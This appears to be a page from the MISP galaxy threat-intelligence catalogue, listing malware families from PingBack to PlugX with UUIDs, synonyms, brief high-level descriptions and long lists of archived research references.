Internal MISP references
UUID a05b1eba-8e89-4d05-97ef-cacc5a083913
which can be used as unique global reference for PingBack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pipcreat
Internal MISP references
UUID ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5
which can be used as unique global reference for pipcreat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PipeMon
Internal MISP references
UUID 34c0b51a-7139-44ab-b09a-cef646e66ba0
which can be used as unique global reference for PipeMon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon - webarchive
- https://twitter.com/ESETresearch/status/1506904404225630210 - webarchive
- https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html - webarchive
- https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PipeSnoop
Cisco Talos states that PipeSnoop can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PipeSnoop.
Known Synonyms |
---|
TOFUPIPE |
Internal MISP references
UUID 29e75560-d16f-4434-a6a5-0258a916103d
which can be used as unique global reference for PipeSnoop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PirateStealer
Infostealer
Internal MISP references
UUID 19748031-0d8d-4e76-bf8e-0838f8a3d07c
which can be used as unique global reference for PirateStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pirpi
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pirpi.
Known Synonyms |
---|
CookieCutter |
SHOTPUT |
Internal MISP references
UUID e2325481-006f-4ad4-86d9-1a2ae6fea154
which can be used as unique global reference for pirpi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-mayfair - webarchive
- https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html - webarchive
- https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pitou
According to TG Soft, Pitou was released in April 2014. It may be an evolution of the rootkit "Srzizbi" developed in 2008. Pitou is a spambot; its main goal is to send spam from the victim's computer.
Internal MISP references
UUID f371c85c-56f6-4ddf-8502-81866da4965b
which can be used as unique global reference for Pitou
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou - webarchive
- https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf - webarchive
- http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.565.9211&rep=rep1&type=pdf - webarchive
- https://isc.sans.edu/diary/rss/25068 - webarchive
- https://www.tgsoft.it/english/news_archivio_eng.asp?id=884 - webarchive
- https://johannesbader.ch/2019/07/the-dga-of-pitou/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PittyTiger RAT
Internal MISP references
UUID 7ac902e0-4a7d-4451-b0fd-cdf98fbe5018
which can be used as unique global reference for PittyTiger RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/ - webarchive
- https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pkybot
Pkybot is a trojan whose roots lie in a downloader dubbed Bublik in 2013; it was seen distributing GameoverZeus in 2014 (ref: Fortinet). At the beginning of 2015, webinject capability using the infamous ATS (automatic transfer system) was added, according to Kleissner, Kafeine and iSight.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pkybot.
Known Synonyms |
---|
Bublik |
Pykbot |
TBag |
Internal MISP references
UUID 19d71f38-422c-48f4-9f90-867eb4d4182e
which can be used as unique global reference for Pkybot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PLAINTEE
Internal MISP references
UUID 66087a9c-b5ac-4d6d-b79e-c0294728c876
which can be used as unique global reference for PLAINTEE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/rancortaurus/ - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PLAY
According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.
After we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a ".PLAY" extension. For example, a file titled "1.jpg" appeared as "1.jpg.PLAY", "2.png" as "2.png.PLAY", etc. Once the encryption process was completed, PLAY created a text file named "ReadMe.txt" on the desktop.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLAY.
Known Synonyms |
---|
PlayCrypt |
Internal MISP references
UUID 52cf16fb-aab7-4d93-a624-e12c18064720
which can be used as unique global reference for PLAY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.play - webarchive
- https://www.orangecyberdefense.com/global/blog/playing-the-game - webarchive
- https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/ - webarchive
- https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware - webarchive
- https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play - webarchive
- https://adlumin.com/post/playcrypt-ransomware-as-a-service-expands-threat-from-script-kiddies-and-sophisticated-attackers/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy - webarchive
- https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/ - webarchive
- https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65 - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
- https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware - webarchive
- https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
playwork
Internal MISP references
UUID 5e1f467b-f81e-487c-a911-ab63ae7e9b86
which can be used as unique global reference for playwork
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PLEAD (Windows)
PLEAD is a RAT used by the actor BlackTech. FireEye uses the synonyms GOODTIMES for the RAT module and DRAWDOWN for the respective downloader.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PLEAD (Windows).
Known Synonyms |
---|
DRAWDOWN |
GOODTIMES |
Linopid |
Internal MISP references
UUID 43a56ed7-8092-4b36-998c-349b02b3bd0d
which can be used as unique global reference for PLEAD (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plead - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/ - webarchive
- http://www.freebuf.com/column/159865.html - webarchive
- https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html - webarchive
- https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt - webarchive
- https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html - webarchive
- https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/ - webarchive
- https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf - webarchive
- https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf - webarchive
- https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf - webarchive
- https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html - webarchive
- https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/ - webarchive
- http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html - webarchive
- https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf - webarchive
- https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ploutus ATM
Internal MISP references
UUID d91c4184-608e-47b1-b746-0e98587e2455
which can be used as unique global reference for Ploutus ATM
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm - webarchive
- http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html - webarchive
- https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america - webarchive
- https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam - webarchive
- https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study - webarchive
- https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ployx
Internal MISP references
UUID 7bad2f44-93b0-406d-a619-28f14c4bd344
which can be used as unique global reference for ployx
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PlugX
RSA describes PlugX as a RAT (Remote Access Trojan) malware family that has been around since 2008 and is used as a backdoor to fully control the victim's machine. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.
Notable features of this malware family are the ability to execute commands on the affected machine to:
- retrieve machine information
- capture the screen
- send keyboard and mouse events
- perform keylogging
- reboot the system
- manage processes (create, kill and enumerate)
- manage services (create, start, stop, etc.)
- manage Windows registry entries
- open a shell, etc.
The malware also logs its events in a text log file.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PlugX.
Known Synonyms |
---|
Destroy RAT |
Kaba |
Korplug |
RedDelta |
Sogu |
TIGERPLUG |
Internal MISP references
UUID 036bd099-fe80-46c2-9c4c-e5c6df8dcdee
which can be used as unique global reference for PlugX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx - webarchive
- https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims - webarchive
- https://www.macnica.net/file/security_report_20160613.pdf - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf - webarchive
- https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-olive - webarchive
- https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/ - webarchive
- https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-woodland - webarchive
- https://hunt.io/blog/unmasking-adversary-infrastructure-how-certificates-and-redirects-exposed-earth-baxia-and-plugx-activity - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_8_yi-chin_yu-tung_en.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html - webarchive
- https://attack.mitre.org/groups/G0001/ - webarchive
- https://github.com/Still34/landing/blob/master/assets/slides/2024-08-Sailing%20the%20Seven%20SEAs.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html - webarchive
- https://mahmoudzohdy.github.io/posts/re/plugx/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf - webarchive
- https://twitter.com/stvemillertime/status/1261263000960450562 - webarchive
- https://blog.xorhex.com/blog/mustangpandaplugx-1/ - webarchive
- https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf - webarchive
- https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/ - webarchive
- https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/ - webarchive
- http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html - webarchive
- https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html - webarchive
- https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/ - webarchive
- http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/ - webarchive
- https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/ - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/ - webarchive
- https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/ - webarchive
- https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-riverside - webarchive
- https://blog.ensilo.com/uncovering-new-activity-by-apt10 - webarchive
- https://asec.ahnlab.com/en/49097/ - webarchive
- https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt- - webarchive
- https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ - webarchive
- https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/ - webarchive
- https://www.secureworks.com/blog/bronze-president-targets-government-officials - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage - webarchive
- https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/ - webarchive
- https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/ - webarchive
- https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited - webarchive
- https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/ - webarchive
- https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia - webarchive
- https://www.contextis.com/en/blog/dll-search-order-hijacking - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://www.contextis.com/de/blog/avivore - webarchive
- https://blog.vincss.net/re027-china-based-apt-mustang-panda-might-still-have-continued-their-attack-activities-against-organizations-in-vietnam/ - webarchive
- https://securelist.com/time-of-death-connected-medicine/84315/ - webarchive
- https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/ - webarchive
- https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf - webarchive
- https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html - webarchive
- https://unit42.paloaltonetworks.com/operation-diplomatic-specter/ - webarchive
- https://www.youtube.com/watch?v=IRh6R8o1Q7U - webarchive
- https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack - webarchive
- https://unit42.paloaltonetworks.com/unsigned-dlls/ - webarchive
- https://therecord.media/redecho-group-parks-domains-after-public-exposure/ - webarchive
- https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html - webarchive
- https://www.us-cert.gov/ncas/alerts/TA17-117A - webarchive
- https://www.mmcert.org.mm/en/file-download/download/public/374 - webarchive
- https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/ - webarchive
- https://www.mandiant.com/resources/blog/infected-usb-steal-secrets - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf - webarchive
- https://archive.is/LJFEF - webarchive
- https://www.lac.co.jp/lacwatch/people/20171218_001445.html - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://www.youtube.com/watch?v=C_TmANnbS2k - webarchive
- https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader - webarchive
- https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-president - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://blog.xorhex.com/blog/mustangpandaplugx-2/ - webarchive
- https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html - webarchive
- https://securelist.com/cycldek-bridging-the-air-gap/97157/ - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html - webarchive
- https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf - webarchive
- https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers - webarchive
- https://www.youtube.com/watch?v=6SDdUVejR2w - webarchive
- https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/ - webarchive
- https://www.youtube.com/watch?v=r1zAVX_HnJg - webarchive
- https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf - webarchive
- http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html - webarchive
- https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/ - webarchive
- https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf - webarchive
- https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/ - webarchive
- https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader - webarchive
- https://unit42.paloaltonetworks.com/thor-plugx-variant/ - webarchive
- https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf - webarchive
- https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/ - webarchive
- https://engineers.ffri.jp/entry/2022/11/30/141346 - webarchive
- https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/ - webarchive
- https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/ - webarchive
- https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape - webarchive
- https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf - webarchive
- https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-express - webarchive
- https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/ - webarchive
- https://attack.mitre.org/groups/G0096 - webarchive
- https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf - webarchive
- https://hitcon.org/2024/CMT/slides/Sailing_the_Seven_SEAs_Deep_Dive_into_Polaris_Arsenal_and_Intelligence_Insights.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-SOGU-with-Google-Security-Operations/ba-p/758777 - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.contextis.com/en/blog/avivore - webarchive
- https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/ - webarchive
- https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/ - webarchive
- https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf - webarchive
- https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/ - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf - webarchive
- https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-firestone - webarchive
- https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/ - webarchive
- https://www.recordedfuture.com/china-linked-ta428-threat-group - webarchive
- https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf - webarchive
- https://www.youtube.com/watch?v=qEwBGGgWgOM - webarchive
- https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf - webarchive
- https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report - webarchive
- https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html - webarchive
- https://www.youtube.com/watch?v=-7Swd1ZetiQ - webarchive
- https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn - webarchive
- https://www.secureworks.com/research/bronze-president-targets-ngos - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-keystone - webarchive
- https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/ - webarchive
- https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor - webarchive
- http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html - webarchive
- https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a - webarchive
- https://tracker.h3x.eu/info/290 - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse - webarchive
- https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html - webarchive
- https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/ - webarchive
- https://community.rsa.com/thread/185439 - webarchive
- https://www.trendmicro.com/en_us/research/24/c/earth-krahang.html - webarchive
- https://blog.vincss.net/vi/re012-2-phan-tich-ma-doc-loi-dung-dich-covid-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-nguyen-xuan-phuc-phan-2-2/ - webarchive
- https://blog.vincss.net/vi/re012-1-phan-tich-ma-doc-loi-dung-dich-covid-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-nguyen-xuan-phuc-phan-1-2/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf - webarchive
- https://blog.talosintelligence.com/dragon-rank-seo-poisoning/ - webarchive
- https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-union - webarchive
- https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop - webarchive
- https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/ - webarchive
- https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt - webarchive
- https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/ - webarchive
- https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html - webarchive
- https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/ - webarchive
